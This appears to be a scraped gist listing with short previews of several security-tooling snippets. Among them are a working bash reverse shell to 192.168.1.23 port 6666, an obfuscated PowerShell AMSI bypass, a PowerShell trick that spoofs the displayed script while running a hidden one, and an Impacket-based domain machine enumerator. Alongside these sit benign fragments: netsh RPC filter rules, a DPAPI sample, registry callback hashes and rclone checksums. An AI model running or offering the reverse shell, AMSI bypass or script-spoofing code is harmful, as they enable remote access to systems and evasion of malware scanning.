This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
netsh | |
rpc filter | |
add rule layer=um actiontype=block | |
add condition field=if_uuid matchtype=equal data=12345678–1234-ABCD-EF00–0123456789AB | |
add filter | |
add rule layer=um actiontype=block | |
add condition field=if_uuid matchtype=equal data=c681d488-d850–11d0–8c52–00c04fd90f7e |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bash -i >& /dev/tcp/192.168.1.23/6666 0>&1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$SpoofedAst = [ScriptBlock]::Create("Write-Output 'Hello'").Ast | |
$ExecutedAst = [ScriptBlock]::Create("Write-Output 'My Hidden Hello Hidden'").Ast | |
$Ast = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAst.Extent,$null,$null,$null,$ExecutedAst.EndBlock.Copy(),$null) | |
$Sb = $Ast.GetScriptBlock() | |
$Sb& |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add NugetComponent Microsoft.Win32.Registry | |
Add NugetComponent System.Security.Cryptography.ProtectedData | |
Program.cs based on https://github.com/sergeig888/csharp-dpapi-PBIE/ | |
Tested on lates version Kiteworks 8.3.0 | |
========================================= | |
/* Created by Sergei Gundorov 1/2/2020 | |
* Intent: provide sample project for encrypting secrets with DPAPI while working with | |
* Power BI Embedded and API tutorials and samples. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import json | |
# Proxy settings fo debug (with burp or other) | |
proxy_enable = False | |
proxy = { | |
'http': 'http://127.0.0.1:8080', | |
'https': 'http://127.0.0.1:8080' | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# modifications of original script GetAdusers.py from Impacket. | |
# this version returns the list of last seen 24h machines | |
#python list_machines.py TIMATEC.local/fbu -dc-ip 192.168.16.11 | |
#Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation | |
# | |
#Password: | |
#[*] Querying 192.168.16.11 for information about domain. | |
#Name PasswordLastSet LastLogon OperatingSystemVersion OperatingSystem IP Address | |
#-------------------- -------------------------- -------------------------- ---------------------- --------------------------------------- ------------ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from __future__ import print_function | |
import json | |
import re | |
import socket | |
import ssl | |
import subprocess | |
import sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'ntdll.dll' '4097367' '0x3e8557' | |
'RegNtCallbackObjectContextCleanup' '1094975913383384674' '0xf3222cab2d35662' | |
'RegNtPostCreateKey' '76320549262' '0x11c50f298e' | |
'RegNtPostCreateKeyEx' '686884943685' '0x9fed887745' | |
'RegNtPostDeleteKey' '76320533467' '0x11c50eebdb' | |
'RegNtPostDeleteValueKey' '18545889663766' '0x10de0d2a5b16' | |
'RegNtPostEnumerateKey' '2060655325624' '0x1dfc8a0f1b8' | |
'RegNtPostEnumerateValueKey' '500739244157917' '0x1c76b70c5ebdd' | |
'RegNtPostFlushKey' '25440190120' '0x5ec5a7ea8' | |
'RegNtPostKeyHandleClose' '18545901133010' '0x10de0dd95cd2' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Scrapped from official web site: https://downloads.rclone.org/v.../SHA1SUMS | |
=========================================================================== | |
Windows Clients | |
ecce335a75b0f8678ba0494b178f3b41309b72be rclone-current-windows-386.zip | |
0d9e1fd984d0ab5312060024ab6498046562c134 rclone-current-windows-amd64.zip | |
ecce335a75b0f8678ba0494b178f3b41309b72be rclone-v1.40-windows-386.zip | |
0d9e1fd984d0ab5312060024ab6498046562c134 rclone-v1.40-windows-amd64.zip | |
18d6a87012de120c66b5abaa97f5932fe56beee7 rclone-v1.41-windows-386.zip | |
6f4bee89380b70742ba7d37c80da0f0b4f890612 rclone-v1.41-windows-amd64.zip |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Write-Host '[+] Loading AMSI Bypass...' | |
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} ) | |
Write-Host '[+] done' -ForegroundColor green |
NewerOlder